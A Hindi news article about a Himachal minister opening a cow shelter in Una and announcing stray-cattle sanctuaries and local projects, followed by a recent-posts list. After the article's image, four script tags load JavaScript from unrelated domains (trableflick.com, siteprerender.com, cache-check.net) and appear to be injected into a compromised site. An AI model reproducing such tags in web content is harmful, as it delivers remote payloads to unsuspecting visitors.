Categories: हिमाचल

ऊनाः पंचायती राज मंत्री वीरेंद्र कंवर ने बड़ूही में किया गौशाला का शुभांरभ

<p>ग्रामीण विकास, पंचायती राज, कृषि, मत्स्य और पशु पालन मंत्री वीरेंद्र कंवर ने जिला ऊना के बड़ूही में नवनिर्मित गौशाला का शुभारंभ किया। इस अवसर पर वीरेंद्र कंवर ने कहा कि गौशाला का निर्माण लगभग 18 लाख रुपए की राशि से किया गया है तथा यहां पर लगभग 80 बेसहारा पशुओं को रखने की सुविधा होगी। उन्होंने गौ सेवकों के ठहरने की व्यवस्था बनाने को 5 लाख रुपए देने की घोषणा की। साथ ही उन्होंने बडूही में खेल मैदान बनाने के साथ-साथ पंचवटी योजना के तहत एक पार्क बनाने का ऐलान किया है। जहां पर बुजुर्गों के लिए वॉकिंग ट्रैक और बच्चों के लिए झूले इत्यादि का प्रबंध किया जाएगा। इसके अलावा उन्होंने गौशाला तक सड़क को बेहतर बनाने के लिए हर संभव मदद का वादा किया। कृषि मंत्री ने कहा कि चिंतपूर्णी विधानसभा क्षेत्र में एक फीड मिल का शुभारंभ जल्द किया जाएगा। बड़ूही के बाद टकारला में भी गौशाला बनाने की तैयारी है, जिसका भूमि पूजन जल्द होगा। इसके अलावा तीन गौशालाओं का शुभारंभ अगले महीने किया जाएगा।</p>

<p>पंचायती राज मंत्री ने कहा कि प्रदेश सरकार ने डेढ़ वर्ष में सड़कों को पशु मुक्त बनाने का लक्ष्य रखा है। इस लक्ष्य की प्राप्ति के लिए राज्य के 11 जिलों में गौ अभ्यारण्य स्थापित किए जा रहे हैं। थाना कलां में 320 कनाल भूमि में बनाए जा रहे गौ अभ्यारण्य के पहले चरण का कार्य पूरा कर लिया गया है। उन्होंने कहा कि अन्य चार गौ अभ्यारण्यों का निर्माण कार्य अंतिम चरण में है और उम्मीद है कि जल्द ही इन्हें क्रियाशील कर दिया जाएगा, जिससे सड़क पर बेसहारा गौवंश की समस्या समाप्त करने में मदद मिलेगी। कृषि मंत्री ने कहा कि देसी गाय का वैज्ञानिक आधार है, इसीलिए गाय को माता कहा जाता है। देसी गाय प्राकृतिक खेती का भी आधार है और देसी गाय के गोबर से भूमि की उर्वरक क्षमता को बढ़ाया जा सकता है। वीरेंद्र कंवर ने कहा कि एक अगस्त से गौ सदन संचालकों को प्रदेश सरकार की ओर से प्रत्येक माह 500 रुपए प्रति गाय की राशि मिलना शुरू हो गई है और मुख्यमंत्री जयराम ठाकुर ने इस योजना का आरंभ कर दिया है।</p>

<p>इस अवसर पर चिंतूपर्णी के विधायक बलबीर सिंह ने कहा कि चिंतपूर्णी विधानसभा क्षेत्र में विकास परियोजनाओं पर प्रदेश सरकार करोड़ों रुपए खर्च कर रही है। विस क्षेत्री की सड़कों को चकाचक करने के लिए 180 करोड़ रुपए दिए गए हैं। जल जीवन मिशन में चिंतपूर्णी को 26 करोड़ रुपए प्राप्त हुए हैं और बाढ़ नियंत्रण विभाग को 28 करोड़ रुपए की धनराशि उपलब्ध करवाई गई है। बलबीर सिंह ने कहा कि अपने विभागों के माध्यम से वीरेंद्र कंवर ने अपने पिछले अढ़ाई वर्ष के कार्यकाल में गाय और गरीब की सेवा की है। बेसहारा गौवंश की सेवा के लिए शराब पर शुल्क लिया जा रहा है और मंदिरों में चढ़ावे का भी कुछ हिस्सा इस्तेमाल किया जा रहा है।</p>

<p><img src=”/media/gallery/images/image(1078).png” style=”height:600px; width:358px” /></p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1597644072895″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

महात्मा गांधी ने बताया सत्य और अहिंसा का रास्ता: आशीष बुटेल

  पालमपुर: मुख्य संसदीय सचिव शहरी विकास एवं शिक्षा आशीष बुटेल ने महात्मा गांधी की…

6 hours ago

हिमाचल CM सुक्खू बोले- PM मोदी के फैक्ट गलत, कांग्रेस ने 20 महीने में 5 गारंटियां कीं पूरी

Chandigarh: हिमाचल प्रदेश के मुख्यमंत्री सुखविंदर सिंह सुक्खू ने बुधवार को हरियाणा में चुनाव प्रचार…

7 hours ago

कांगड़ा वैली कार्निवल: रिहर्सल के दौरान हादसा, सतिंदर सरताज की प्रस्तुति से पहले स्‍टेज में दौड़ा करंट कलाकार घायल

Kangra: आज कांगड़ा वैली कार्निवल की अंतिम सांस्कृतिक संध्या है। कुछ ही देर में सतिंदर…

7 hours ago

एमसी सोलन को प्रदूषण बोर्ड ने ठोका दस लाख जुर्माना

पार्षद और भाजपा प्रवक्‍ता शैलेंद्र गुप्‍ता ने नगर निगम पर संगीन आरोप कहा- कांग्रेस समर्थिक…

8 hours ago

सुबाथू में स्वच्छता रैली, विधायक विनोद सुल्तानपुरी सहित 30 लोगों ने किया रक्तदान

  सोलन :स्वच्छता ही सेवा 2024 अभियान के तहत मंगलवार को छावनी परिषद् सुबाथू द्वारा…

9 hours ago

अलविदा मानसून 2024: सामान्य से 18% कम बारिश, जानें आगे कैसा रहेगा मौसम

  Shimla: सामान्य से 18 फीसदी बारिश के साथ बुधवार को दक्षिण-पश्चिम मानसून हिमाचल प्रदेश…

10 hours ago